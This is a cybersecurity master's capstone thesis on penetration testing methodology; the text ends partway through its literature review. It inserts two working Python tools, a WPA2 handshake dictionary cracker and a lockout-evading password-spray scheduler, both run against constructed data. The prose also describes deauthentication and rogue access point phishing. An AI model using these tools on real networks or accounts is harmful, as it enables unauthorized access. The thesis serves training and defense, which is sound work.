Penetration Testing Methodologies

by Mathew Stuart

A Capstone Project Submitted to the Faculty of Utica College
December 2019
in Partial Fulfillment of the Requirements for the Degree of Master of Science in Cybersecurity

© Copyright 2019 by Mathew Stuart. All Rights Reserved.

Abstract

Given the rising trend in security breaches among organizations worldwide, cybersecurity has become an increasingly important function in the public and private industry sectors. In addition, the cybersecurity workforce gap has left many organizations without qualified professionals to secure their data. There is a growing need to educate and employ cybersecurity professionals in both commercial organizations and government. The main barriers to beginning a career in cybersecurity are gaining advanced and relevant knowledge and experience in cybersecurity. Knowledge can be difficult and time consuming to obtain, and training can cost money. Because of these barriers, a single source of information that leads to knowledge and experience in cybersecurity is valuable. The purpose of this research was to develop a cybersecurity penetration testing methodology template for use by aspiring cybersecurity professionals to practice penetration testing and develop a personalized methodology. What are the common penetration testing tools and methods for attacking a network or environment from the Internet? What are the common penetration testing tools and methods for attacking a network or environment from the Intranet? What are the common penetration testing tools and methods for attacking web applications? This research is important because penetration testing experience leads to advanced knowledge in cybersecurity, which is an advantage when beginning a career in cybersecurity. Understanding cybersecurity concepts through a security analysis provides a tester with conceptual knowledge and hands-on experience. 
Through the process of developing a penetration testing methodology, an aspiring cybersecurity professional will learn about cybersecurity tools, technologies and procedures.

Acknowledgments

My first acknowledgment is to Professors Krystina Horvath and Anna Ragno for their guidance and assistance throughout this project. Their feedback has been valuable and educational throughout this project. I would also like to thank my family, especially my wife and mother, for all their support throughout these past 7 years as I worked and went to school at the same time. If not for their support and encouragement, I may not have reached this point in my education and career. I would also like to thank Utica College for providing the technical and hands-on education that I was searching for. I learned a great deal from every course, and I was able to utilize that knowledge to gain employment in the cybersecurity industry. Lastly, I would like to thank Michael Denny for taking the time to lend his experience and expertise and be the second reader of this paper. 
Table of Contents

List of Illustrative Materials
Statement of the Problem
Literature Review
    Introduction to Penetration Testing
    Intelligence Gathering
    Wireless Networks
    Web Application Testing
    Intranet
        Scanning and discovery
        Exploitation and gaining access
        Persistence and spreading
        Data gathering and extraction
        Covering tracks
Discussion of the Findings
    Wireless Tool Benefits
    Web Application Testing Results
    Intranet Security Testing Results
    Commonalities
Conclusion
References
Appendix A
Appendix B

List of Illustrative Materials

Figure 7. Nikto Command and Output From a Generic Scan
Figure 8. ZAP Automated Scan Configuration Screen
Figure 9. ZAP Automated Scan Results
Figure 10. Nmap Device Enumeration Command
Figure 11. How to Start a Scan in OpenVAS
Figure 12. Results From OpenVAS Scan
Figure 13. Enum4linux LDAP Output
Figure 14. Enum4linux Users Output
Figure 15. Enum4linux Password Policy Output
Table 1. Example of Basic Nmap Command Options
Table 2. Nmap Stealth Scanning Options
Figure 1. Nikto Options 1
Figure 2. Nikto Options 2
Figure 3. ARP Poisoning Before and After
Figure 4. Enum4Linux Help Page Output
Figure 5. Syntax for Metasploit
Figure 6. Spear Phishing Model: Targeted Cyber Attack

Statement of the Problem

Penetration Testing Methodologies

In the realm of cybersecurity, there are two main roles: red team and blue team. Blue teams are the teams of cybersecurity professionals who defend an environment from compromise. In the event of a compromise, the blue team responds to the incident for the purposes of both minimizing the degree of compromise and gaining knowledge regarding the attack. Blue teams also use data gathered about an attacker for investigations by their organization and/or law enforcement. A red team is a team of cybersecurity professionals whose purpose is to attack an organization's environment for the purpose of authorized security testing, audit and analysis. Red teams only perform offensive actions at the request of those whom they are testing; therefore, offensive testing is always agreed upon beforehand, with strict rules for the teams to follow. These rules include a list of acceptable and unacceptable actions and the scope within which the attack will be conducted (NIST, 2019). A blue team member, or any member on the defensive side of cybersecurity, needs to know more than just how to utilize tools to defend a network. A well-rounded security professional also needs to understand how to perform offensive operations. It is imperative that cybersecurity professionals understand how an attacker can penetrate an environment, which informs the cybersecurity professional how to defend against these types of attacks (NIST, 2019). Penetration testing (pentesting) can help test the blue team's incident response skills and methods. 
A penetration test also helps a blue team identify an organization's vulnerabilities and allows the blue team to make modifications to systems and processes. The process of penetration testing also promotes a proactive approach to blue teaming. If a blue team knows that an environment will be the target of a pentest, it is likely to perform its own ad-hoc penetration test to identify and remediate vulnerabilities ahead of time. This is often the case when penetration tests are required for regulation and compliance purposes (Sanabria, 2018). According to the Offensive Security organization, offense is the best defense. The only way to be confident that risk mitigation strategies protecting a company against cyber-attacks will be effective is through simulation, or proactively testing security measures before a real intruder does. By encouraging students to put themselves in the shoes of a hacker by utilizing the same tools and techniques, Offensive Security is leveling the playing field for defenders (Offensive Security, 2019). In order to secure an environment, it is critical that a cybersecurity professional understand how a potential attacker would attempt to penetrate an organization's environment. The need for offensive security knowledge grows as the number of successful cyber-attacks increases each year. The number of successful security breaches in the U.S. for 2016 was 1,091, which was 40% more than the 780 breaches in 2015. Similarly, there were 1,579 data breaches in the United States in 2017, a 44.7% increase from 2016 (Identity Theft Resource Center, 2018). The shock of data breach frequency is compounded by the average cost of a data breach in the United States. IBM's report on data breaches states that the average cost of a data breach in the United States is $8.19 million per breach (IBM, 2019). 
With the risk of an organization losing millions of dollars, and the possibility of millions more in lost revenue due to a damaged reputation as the result of a data breach, organizations are on the lookout for qualified cybersecurity professionals to protect their environments. There is currently a severe shortage of qualified cybersecurity professionals worldwide. A study conducted by Cybersecurity Ventures states, "A 2016 skills gap analysis from ISACA estimated a global shortage of 2 million cybersecurity professionals by 2019 (a half-million more than Symantec's prior estimate), according to the United Kingdom House of Lords Digital Skills Committee" (Morgan, 2017). In the United States, there was a shortage of about 314,000 cybersecurity professionals as of January 2019 (Crumpler & Lewis, 2019). The data breach frequency, the cost to an organization per data breach, and the large cybersecurity workforce gap all underline the need for more cybersecurity professionals. An increase in cybersecurity professionals to fill the workforce gap would also improve the security posture of organizations in the United States and around the world.

One of the questions regarding the cybersecurity workforce gap is why the gap exists in the first place. The International Information Systems Security Certification Consortium, also known as ISC2, performed a study in 2018 regarding the workforce gap, and it showed that "Despite [cybersecurity] professionals looking to shift priorities, as well as other concerns and challenges, 68% of respondents say they are somewhat or very satisfied with their jobs" (International Information Systems Security Certification Consortium, 2018). With most cybersecurity professionals satisfied with their jobs, the question remains as to why more people are not filling the workforce gap. ISC2 also investigated this issue. 
According to ISC2's survey, 34% of people surveyed do not know which career path opportunities lead to a role in cybersecurity, 32% of organizations do not know about cybersecurity skills, and the same percentage of people surveyed cannot afford certification training and/or the certifications themselves. Twenty-eight percent of people surveyed cannot afford the formal education to prepare them for a career in cybersecurity, and 26% of people surveyed said they do not have enough experience in cybersecurity to get a job in the industry. This is a problem because 49% of organizations surveyed in the same survey stated that the most important qualification for employment is relevant cybersecurity work experience, while 40% of organizations stated that extensive cybersecurity work experience is the most important qualification for employment (International Information Systems Security Certification Consortium, 2018). It is difficult to begin working in the cybersecurity industry if one does not have prior cybersecurity experience.

Between the time it takes to learn cybersecurity skills, the costs of training, and the requirement for prior cybersecurity experience, it is not surprising that there is such a large workforce gap. The lack of quality, open-source training materials that cover the steps needed to learn cybersecurity, specifically offensive security, is the main issue. Offensive security is so important because the previously mentioned ISC2 survey reported that 47% of organizations named advanced cybersecurity concepts as the most important qualification for employment. Another 40% believe relevant cybersecurity experience is the most important factor for employment, meaning that 87% of organizations require prior experience for employment (International Information Systems Security Certification Consortium, 2018). 
Offensive security knowledge falls under advanced cybersecurity concepts and relevant cybersecurity knowledge, making penetration testing and red team skills a highly coveted skill set. Gaining knowledge and experience in the cybersecurity field can occur at home during a person's spare time. There are ways of creating home cybersecurity testing labs that allow a person to test and practice what they learn. In one example, a cybersecurity student, Vitaly Ford, posted instructions on how to create such a lab environment using virtual machines. Ford's blog post also provides links to resources such as virtual machine images that can easily be used with virtual machine hosting software, also known as a hypervisor; VirtualBox is one example. Ford's first steps are to learn how to install a hypervisor and a virtual machine, typically with Microsoft Hyper-V, Oracle VirtualBox, or VMware Workstation/Fusion. In addition, one can begin developing a network diagram that will help the pentester stay on track once the virtual machines are installed and connected together (Ford, 2017). Ford's steps are one option among several for gaining hands-on experience and cybersecurity knowledge. Hands-on penetration testing experience is also possible through the penetration testing environments provided by Hack the Box (hackthebox.eu). If a user manages to create an account, that user can download the OpenVPN configuration file for their Hack the Box account, which connects them to the lab network. This allows the user to perform attacks against pre-built machines in the environment and thus test what they have learned about penetration testing. "Hack the Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field" (Hack the Box, 2019). 
The pre-built machines in Hack the Box's environment range in difficulty. On each machine the goal is to gain user-level and then root-level access; once a tester has one or both, they submit the proof to Hack the Box, which awards points for correct submissions. Practicing penetration testing on the easier machines is often a good start and a great learning experience. This paper addresses the lack of penetration testing methodology templates that beginners in the field of cybersecurity could use to develop a personalized penetration testing method that works best for them. There is a lack of cybersecurity learning materials for new professionals that give an overview of how to use different tools and how to use them at each step of a penetration test. For those seeking advanced cybersecurity conceptual knowledge, the main barriers to entering the cybersecurity field are time, money and a lack of cybersecurity experience. A penetration testing template would assist an information technology professional in gaining cybersecurity knowledge and experience. Those with little to no cybersecurity experience who wish to perform penetration tests tend to research multiple online sources in order to gain the knowledge they need. Instead, there should be a single template of penetration testing best practices, with tool syntax and examples, that provides a starting point for beginners to develop their own pentesting methodology. This paper begins that journey for those who wish to learn how a pentest is performed from beginning to end. It includes steps on how to discover hosts, find vulnerabilities, exploit example vulnerabilities, maintain persistence on a machine, exfiltrate data and erase evidence of an attack to cover the attacker's tracks. These penetration testing steps include syntax for the tools covered in this paper and best practices on how to use those tools. 
The purpose of this research is to review different penetration testing methodologies and to discuss the advantages and disadvantages of each methodology in order to provide a best-practice method for attacking networks. The networks and environments that will be explored are the Intranet, the Internet and web applications. This will focus on information at a beginner's level, thus creating a template that can be used as a baseline for creating a more advanced and personalized methodology as a user's skills and knowledge increase over time and through practice. In order to provide best practices, the following questions will be answered: what are the common penetration testing tools and methods for attacking a network or environment from the Internet? What are the common penetration testing tools and methods for attacking a network or environment from the Intranet? What are the common penetration testing tools and methods for attacking web applications?

Literature Review

Introduction to Penetration Testing

There are three different types of penetration tests: Black Box, White Box and Grey Box. The type of penetration test that is performed depends on the amount of information that is provided to the tester before testing begins. Black Box testing is conducted when the tester is given no information about an organization's network or code. White Box testing is when the tester is given full knowledge of an organization's network or source code. Grey Box testing is a combination of White and Black Box testing, meaning that the tester has limited knowledge of the network or source code (Khan & Khan, 2012). The seven main phases of a penetration test are as follows:
- Discovery
- Enumeration/Info Gathering
- Exploitation
- Privilege escalation
- Persistence/Maintaining Access
- Covering Tracks
- Documentation/Reporting
(Ali, Allen, & Heriyanto, 2014, pp. 60-66). 
In the book Advanced Penetration Testing for Highly-Secured Environments (2016), the authors explain the Penetration Testing Execution Standard (PTES) and outline the standard's structure. The seven sections of the PTES are pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting. The PTES explanation does not include a technical guide for the standard, but it does reference a URL for the PTES technical guidelines. In the PTES technical guidelines, the steps are broken down into smaller steps with technical information, but the core of the guidelines is the same as the outline found in Advanced Penetration Testing for Highly-Secured Environments (Allen & Cardwell, 2016, p. 11).

Standards in penetration testing are often vague, general and procedural in nature, as opposed to being technical and providing specific details. A commonality throughout penetration testing is the use of tools and toolsets to perform those tests. Open-source tools are most often used to perform penetration tests. Penetration testers use stand-alone tools and toolsets, chosen for their effectiveness and the tester's familiarity with them. If the tester is not familiar with their tools, the test will not be effective. There are many open-source and paid tools, but testers need to choose their toolsets to fit the needs of the test. As an example, in an application security test, Aircrack-ng would not normally be necessary because Aircrack-ng was made for wireless network testing and the test is performed on a software's security and not the security of the network. The same could be said if the situation were reversed: a static code analyzer would not be required for a network penetration test. Ensuring the toolset matches the test and that the penetration tester is familiar with their toolset is easily the most important aspect of a penetration test (Velu, 2017, pp. 201-206).

Intelligence Gathering

The discovery phase begins with intelligence gathering and the discovery of devices that could be compromised. The three intelligence gathering methodologies are open source intelligence (OSINT), cyber intelligence (CYBINT) and human intelligence (HUMINT). Cyber intelligence involves finding information about the target on the Internet and is a subset of open source intelligence, meaning intelligence found via an open source tool or platform. Another intelligence gathering location is online social networks (OSNs). OSNs are part of CYBINT, and for good reason, as OSNs commonly hold a wealth of data on individuals within a company and on the organization itself (Sood & Enbody, 2014, pp. 23-34). Human intelligence occurs when an attacker acquires information about the target by analyzing responses from people through direct interaction. This can include phishing emails or physically posing as someone else to trick the target into providing the attacker information. These practices are also known as social engineering (Sood & Enbody, 2014). Social media has changed open source intelligence in a profound way. Through OSNs, intelligence on both individuals and organizations is discoverable through social media accounts such as Facebook, YouTube, Instagram, Snapchat, and Twitter. When reviewing the target's social media posts, it is possible to gather the target's location during certain times of day, friend lists, liked pages, and group associations. The information gathered from OSNs provides the attacker with an overview of what the target likes and what kind of information they are most receptive to. This can give an attacker the information needed to manipulate a user through social engineering as part of an attack against the specific user or an organization (Bahybars-Hawks, 2015, pp. 155-172). OSINT also includes discovering publicly facing devices of a target organization. 
This could include websites, Internet-accessible servers and/or Internet-accessible networking equipment. The target discovery phase mostly entails identifying the status of a target's network and operating systems (OS), and mapping out the organization's information technology infrastructure. This provides the penetration tester with a better understanding of the technologies and devices used within an organization and may further help the tester in enumerating services. By utilizing tools in Kali Linux, the tester can determine which hosts are live on a network and which operating systems are running on them, and will be able to characterize each device according to its role. The tools in Kali Linux use active and passive detection techniques, and manipulate network protocols in various ways, to gather information from the OS and running services (Ali, Allen, & Heriyanto, 2014, pp. 82-83). There are several sources for learning the syntax of a given tool. Online cheat sheets and user guides are a good way to gain a basic understanding of a tool's syntax and uses.

Wireless Networks

When a penetration test involves compromising a wireless network, that network can end up being the key to compromising an entire company. Some tools and toolsets in Kali Linux are useful when testing a wireless network's security. Two of the most widely used are Aircrack-ng and Kismet. Kismet can be used as a wireless detector, sniffer, and intrusion detection system. Kismet can detect and sniff the name of a wireless network (SSID) along with its basic service set identifier (BSSID), which is the MAC address of the wireless access point (WAP), the channel it is broadcasting on, and the MAC addresses of the clients connected to it. Kismet supports plugins that expand the wireless protocols that can be sniffed (Beggs, 2017, pp. 206-207). 
It can also sniff traffic for the other Institute of Electrical and Electronics Engineers (IEEE) Wi-Fi standards: 802.11a, 802.11b, 802.11g, and 802.11n. These IEEE 802.11 standards are wireless local area network (WLAN) standards that, among other features, define the speed and security of wireless traffic. The latest IEEE standard for wireless networks is 802.11ay, which allows a possible 20 gigabits per second download and upload speed (IEEE, 2019). Kismet performs reconnaissance by placing the attacker's wireless network interface card (WNIC) in monitor mode, in which the card passes every 802.11 frame it hears to the software rather than only frames addressed to it. Kismet then captures the frames transmitted over the air and discovers the SSIDs in the area and, with additional capture hardware and plugins, other radio sources. The information gathered by Kismet is useful in different ways. For example, knowing the wireless security protocol lets the attacker choose the appropriate attack and cracking approach in Aircrack-ng to extract authentication information. Knowing the MAC addresses allows the attacker to attempt different types of attacks. For example, with the BSSID and client addresses a tester can perform a disassociation attack such as Omerta against a WAP that does not detect or block it. Kismet obtains a variety of information when sniffing the 802.11 spectrum (Beggs, 2017, pp. 206-207). "Omerta is an 802.11 DoS tool that sends disassociation frames to all stations on a channel in response to data frames. The Omerta attack is characterized by disassociation frames with a reason code of 0x01" (Aruba Networks, 2019). The authentication information that a wireless network uses allows a security tester to find any weak authentication protocols in use, and depending on the protocol there may be known vulnerabilities and possible exploits. Another well-known open-source wireless security tool is Aircrack-ng. 
The toolset specializes in wireless security testing and comprises an array of tools that can perform almost any task required during a wireless security penetration test. The following is a list of each tool in the Aircrack-ng suite and its use:
- Airbase-ng: used for rogue access point creation.
- Aircrack-ng: a cracking and recovery tool for WEP and WPA/WPA2 keys.
- Airdecap-ng: decryption of captured WEP and WPA/WPA2 wireless traffic once the key is known.
- Airdecloak-ng: used for bypassing WEP cloaking, a WEP method for fooling WEP cracking tools.
- Aireplay-ng: generates and injects wireless traffic for attacks.
- Airmon-ng: places the WNIC into monitor mode so that all 802.11 frames can be observed.
- Airodump-ng: used for 802.11 monitoring and sniffing, and for writing captures to file.
- Airodump-ng-oui-update: updates the Organizationally Unique Identifier (OUI) database.
- Airolib-ng: maintains a local database of ESSIDs, passphrases and precomputed PMKs to speed up cracking.
- Airserv-ng: exposes the wireless card over the network so that Aircrack-ng tools on other hosts can use it.
- Airtun-ng: creates virtual tunnel interfaces.
- Besside-ng: an automated WEP and WPA attack tool that cracks all WEP-protected networks the WNIC can see and records all WPA handshakes.
- Easside-ng: sets up communication via a WEP-protected AP without the WEP key.
- Packetforge-ng: creates forged wireless packets for other attacks.
- Tkiptun-ng: injects a few frames into a WPA TKIP network with quality of service (QoS) (Fadyushin & Popov, 2016, pp. 154-159).

Penetration testers can crack a Wi-Fi Protected Access 2 (WPA2) pre-shared key by first using Airmon-ng to place the interface into monitor mode so that the interface can see all frames traveling through the air. The next step is to use Airodump-ng to capture traffic, which displays the visible networks and clients in a table and writes the captured frames to a file. The Aireplay-ng tool then forces de-authentication of a wireless client, which makes the client re-authenticate to the WAP. This allows Airodump-ng to capture the WPA four-way handshake as it travels over the air. 
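What the cracking tool then does with that captured handshake, as an added example that is not aircrack-ng's own code and not from the cited book: it implements the 802.11i key derivation and MIC check that any WPA2-PSK cracker performs, so the reader can see why a captured handshake plus a wordlist is enough to recover the passphrase offline. The SSID, MAC addresses, nonces and EAPOL frame are constructed here (the MIC is computed from the "true" passphrase, as a real client would do), not sniffed from the air.

```python
"""Offline dictionary attack on a captured WPA2-PSK four-way handshake.

Added example, not aircrack-ng's own code: it performs the same computation
aircrack-ng runs on a captured handshake (IEEE 802.11i):
  PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
  PTK = PRF-512(PMK, "Pairwise key expansion",
                min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
  KCK = PTK[0:16]
  MIC = HMAC-SHA1(KCK, EAPOL-Key frame with its MIC field zeroed)[:16]   (WPA2/CCMP)
A candidate passphrase is correct when the MIC it produces equals the MIC in
the captured message 2 of the handshake.  The "capture" below (SSID, MACs,
nonces, EAPOL frame) is constructed for this demonstration, not sniffed.
"""
import hashlib
import hmac
from typing import Optional

MIC_OFFSET = 81  # EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
                 # + replay counter (8) + nonce (32) + key IV (16) + RSC (8) + key ID (8)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key; its first 16 bytes are the Key Confirmation Key (KCK)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC of an EAPOL-Key frame: HMAC-SHA1 over the frame with the MIC field zeroed (CCMP).
    TKIP networks use HMAC-MD5 here instead."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP) carrying the SNonce and the MIC."""
    body = (b"\x02"                 # descriptor type: RSN
            + b"\x01\x0a"           # key info: MIC set, pairwise, descriptor version 2 (HMAC-SHA1-128)
            + b"\x00\x10"           # key length
            + b"\x00" * 7 + b"\x01"  # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, key IV, RSC, key ID
            + mic + b"\x00\x00")    # MIC, key data length = 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, packet type EAPOL-Key


def crack(ssid, ap_mac, client_mac, anonce, snonce, eapol_frame, wordlist) -> Optional[str]:
    """Try each candidate passphrase; return the one whose MIC matches the capture, else None."""
    target_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), target_mic):
            return candidate
    return None


def make_capture(passphrase: str) -> dict:
    """Constructed stand-in for what airodump-ng would write: the client computed the MIC
    from the true passphrase; the attacker sees everything here except that passphrase."""
    ssid = "CorpWiFi"                                   # constructed SSID
    ap_mac, client_mac = bytes.fromhex("00aa11bb22cc"), bytes.fromhex("4455ee66ff77")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    frame = build_eapol_msg2(snonce, eapol_mic(kck, build_eapol_msg2(snonce)))
    return dict(ssid=ssid, ap_mac=ap_mac, client_mac=client_mac,
                anonce=anonce, snonce=snonce, eapol_frame=frame)


if __name__ == "__main__":
    capture = make_capture("Winter2019")
    print(crack(wordlist=["password", "letmein", "Winter2019"], **capture))  # Winter2019
```

The cost of the attack is the PBKDF2 step (4096 SHA-1 rounds per candidate), which is why Airolib-ng precomputes PMKs per ESSID and why a long, non-dictionary passphrase defeats this approach. The `pmk_from_passphrase` function can be checked against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE").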
Aircrack-ng then tests candidate passphrases against the captured handshake and recovers the key, which authenticates the tester to the wireless network (Fadyushin & Popov, 2016, pp. 154-159).

Password cracking is part of most penetration testing processes. Wireless network handshakes are one example, and password hashes captured from compromised machines are another. There are several types of wireless network authentication methods and security protocols. The password cracking section of the PTES mentions how to crack passwords for different wireless security protocols. For WPA-PSK networks, the pre-shared key can be brute-forced offline once a handshake has been captured. WPA is an acronym for Wi-Fi Protected Access and PSK stands for Pre-Shared Key. In order to succeed, the authentication handshake between a client and the WAP must first be captured with a tool such as Wireshark or Airodump-ng. The next step is to crack the captured handshake, which reveals the passphrase. The Penetration Testing Execution Standard mentions that the Aircrack-ng suite is made specifically for this type of task and is the standard open-source tool for cracking wireless authentication (Pentest-Standard, 2012).

Regarding password cracking, John the Ripper (JTR) is an open-source tool that cracks hashes to reveal passwords. JTR is commonly used against NTLM hashes but also supports Kerberos and the password hashes of other operating systems such as Linux and macOS, depending on the version of JTR that is running, and it can also be used to crack captured WPA/WPA2 handshakes (Fadyushin & Popov, 2016, pp. 154-159). Note that cracking is not decryption: a password hash cannot be reversed, so the tool guesses candidate passwords from a wordlist or a brute-force pattern, hashes each candidate with the same algorithm, and compares the result with the captured hash. Rainbow tables are a separate technique, in which chains of hashes are precomputed and stored in advance to trade disk space for cracking time; JTR relies on wordlists, mangling rules and brute force rather than rainbow tables. As mentioned previously, another way to attack a wireless network is to pose as the wireless network itself. 
This is accomplished by performing a combination of a man-in-the-middle and a phishing attack called AP phishing. AP phishing, or access point phishing, is an attack that involves a rogue access point that serves a captive web portal asking users for sensitive information. If performed correctly, the users will not realize they are being phished, assuming they normally enter credentials in a web portal to access the network. This works best when spoofing access points in public areas such as Starbucks. Airpwn-ng, a separate tool commonly used alongside the Aircrack-ng suite, can perform this attack (Fadyushin & Popov, 2016, pp. 154-159).

Web Application Testing

Referring to the Open Web Application Security Project (OWASP), the penetration testing methodologies page of the OWASP website lists reasons for performing web application penetration tests and references the Penetration Testing Execution Standard (PTES). OWASP also refers to the Payment Card Industry Data Security Standard (PCI DSS) compliance requirement for penetration testing and offers some guidance on the framework for compliance testing. The same page outlines NIST SP 800-115 and the Information Systems Security Assessment Framework (ISSAF), as well as the Open Source Security Testing Methodology Manual (OSSTMM) and the FedRAMP Penetration Test Guidance. This is important for web application penetration testing, as there is always a reason for a test, and regulatory compliance can often be that reason. Understanding the web application penetration testing compliance standards is critical to performing the correct test for the organization (OWASP, 2019).

The Zed Attack Proxy (ZAP) was developed by OWASP as an open-source tool for the sole purpose of finding web application vulnerabilities. The tool has a variety of functions allowing automated and manual scanning of an application. 
The OWASP ZAP user guide on GitHub contains an explanation of the different settings that the ZAP tool offers (Psiinon, 2015). ZAP has multiple modes that serve different functions. Safe mode tells the tool to refrain from any potentially dangerous actions that could affect the web application. Protected mode is the next level up and allows potentially dangerous actions only against URLs in scope. Standard mode is the default when a tester installs and opens the tool and allows the security tester to perform whichever tests they want. Lastly, attack mode tells the tool to actively scan in-scope URLs as they are discovered, running all available tests and attacks against them (Psiinon, 2015).

There are several other tools available to assist a security analyst during a web application penetration test. One such tool is Nikto, an open-source web server scanner that looks for URL paths, index pages, HTTP server options, the server OS and the web hosting software. Because the program reports URL paths and index pages, not everything it finds is a vulnerability. The tool also makes no attempt at stealth, so it can double as a way to test intrusion detection systems (IDS) and/or intrusion prevention systems (IPS). In Kali Linux, the command 'nikto -Help' shows the options for scanning, output format, display, configuration, authentication, and other features, which can be found in Figures 1 and 2 in Appendix B (Sullo, 2019).

A popular, effective and widely used web application security testing tool is Burp Suite, an intercepting proxy that allows a user to capture HTTP and HTTPS traffic between the browser and the application. The tool allows for security testing by manipulating those captured requests and responses, which carry information about the web application. 
Intercepting traffic is performed by configuring the attacker's browser to use Burp Suite as its proxy and then activating Burp Suite's intercept mode, so that each HTTP or HTTPS request is displayed as raw HTTP text and held before it reaches the website, and each response is held before it reaches the browser (Sharma, 2017, pp. 63-71).

One use case for Burp Suite during security testing is capturing the POST requests for a successful and a failed login and using those results in conjunction with Hydra, a tool for credential testing. A POST request is sent to the web application when a user submits information on the website, for example clicking login after entering a username and password. The process is to take the request format and the failure response observed in Burp Suite, use them in Hydra together with a username file and a password file, and let Hydra report which username and password pairs authenticate successfully. This is far faster than manually testing usernames and passwords in the browser (Sharma, 2017, pp. 63-71).

An Outlook Web App (OWA) portal is a popular target for password spraying attacks because OWA usually authenticates against the user's domain credentials. One of the issues in performing password spraying is account lockout, which occurs when a password has been entered incorrectly too many times within the lockout observation window and the account is locked; the attacker can no longer try different passwords indefinitely. A workaround for account lockout limitations is to try one strategically chosen password across all the accounts of an organization's domain rather than many passwords against one account, so that each account sees only a single failed attempt per spraying round (Najera-Gutierrez & Ansari, 2018, pp. 149-156). The lockout threshold and observation window of the target's domain policy dictate how many rounds can be run before the tester must pause. Before performing the password spray, it is important to obtain the username or email address format of the organization, which is usually discovered during OSINT and HUMINT.
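The lockout-avoidance strategy just described, as an added example that is not code from the cited authors: a spray scheduler that tries one password against every account per round and waits out the observation window after threshold minus one rounds, so no account ever reaches the lockout threshold. The OWA endpoint, its accounts and its lockout policy (three failures in 600 seconds) are constructed stand-ins so the script runs offline; in a real engagement try_login would POST to the OWA form, or the attempts would be driven from Burp Intruder, and success would be judged from the response. With Hydra the same one-password-per-round ordering is obtained by giving a single password with -p and the user list with -L, rather than a password list with -P.

```python
"""Lockout-aware password spray scheduler (added example, not from the cited source)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class LockoutPolicy:
    threshold: int          # failed attempts that trigger lockout
    window_seconds: int     # observation window after which the failure counter resets


class MockOwa:
    """Constructed stand-in for a domain-backed OWA login. Not a real server."""

    def __init__(self, accounts, policy):
        self.accounts = accounts            # username -> password (constructed)
        self.policy = policy
        self.failures = defaultdict(list)   # username -> timestamps of recent failures
        self.locked = set()

    def login(self, user, password, now):
        if user not in self.accounts:
            return "failed"
        if user in self.locked:
            return "locked"
        # Failures older than the observation window no longer count.
        recent = [t for t in self.failures[user] if now - t < self.policy.window_seconds]
        if self.accounts[user] == password:
            self.failures[user] = []
            return "success"
        recent.append(now)
        self.failures[user] = recent
        if len(recent) >= self.policy.threshold:
            self.locked.add(user)
            return "locked"
        return "failed"


class FakeClock:
    """Simulated time so the demo does not really sleep."""

    def __init__(self):
        self.t = 0

    def now(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def spray(users, passwords, try_login, policy, sleep, margin=1):
    """One attempt per account per round; pause for the observation window
    after (threshold - margin) rounds. Returns (found_credentials, lockouts)."""
    found, lockouts = {}, 0
    rounds_per_window = max(1, policy.threshold - margin)
    for round_no, password in enumerate(passwords):
        if round_no and round_no % rounds_per_window == 0:
            sleep(policy.window_seconds + 1)     # let every account's counter reset
        for user in users:
            if user in found:
                continue
            result = try_login(user, password)
            if result == "success":
                found[user] = password
            elif result == "locked":
                lockouts += 1
    return found, lockouts


# Constructed data: a user list from OSINT and season-style candidate passwords.
USERS = ["alice", "bob", "carol"]
CANDIDATES = ["Winter2019", "Summer2019", "Autumn2019", "Spring2019", "Password1"]


def run_demo(pause_between_windows=True):
    """Spray the mock OWA; returns (found, lockouts). Unpaced spraying locks bob out."""
    clock = FakeClock()
    policy = LockoutPolicy(threshold=3, window_seconds=600)   # assumed domain policy
    owa = MockOwa({"alice": "Winter2019", "bob": "P@ssw0rd!", "carol": "Summer2019"}, policy)

    def try_login(user, password):
        clock.advance(2)   # each request is assumed to take about two seconds
        return owa.login(user, password, clock.now())

    sleep = clock.advance if pause_between_windows else (lambda seconds: None)
    return spray(USERS, CANDIDATES, try_login, policy, sleep)


if __name__ == "__main__":
    print("paced:  ", run_demo(True))
    print("unpaced:", run_demo(False))
```

The paced run recovers alice's and carol's passwords with zero lockouts; the unpaced run recovers the same two but locks bob out on the third round and keeps hitting the locked account afterwards, which is exactly the noise a blue team alerts on.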
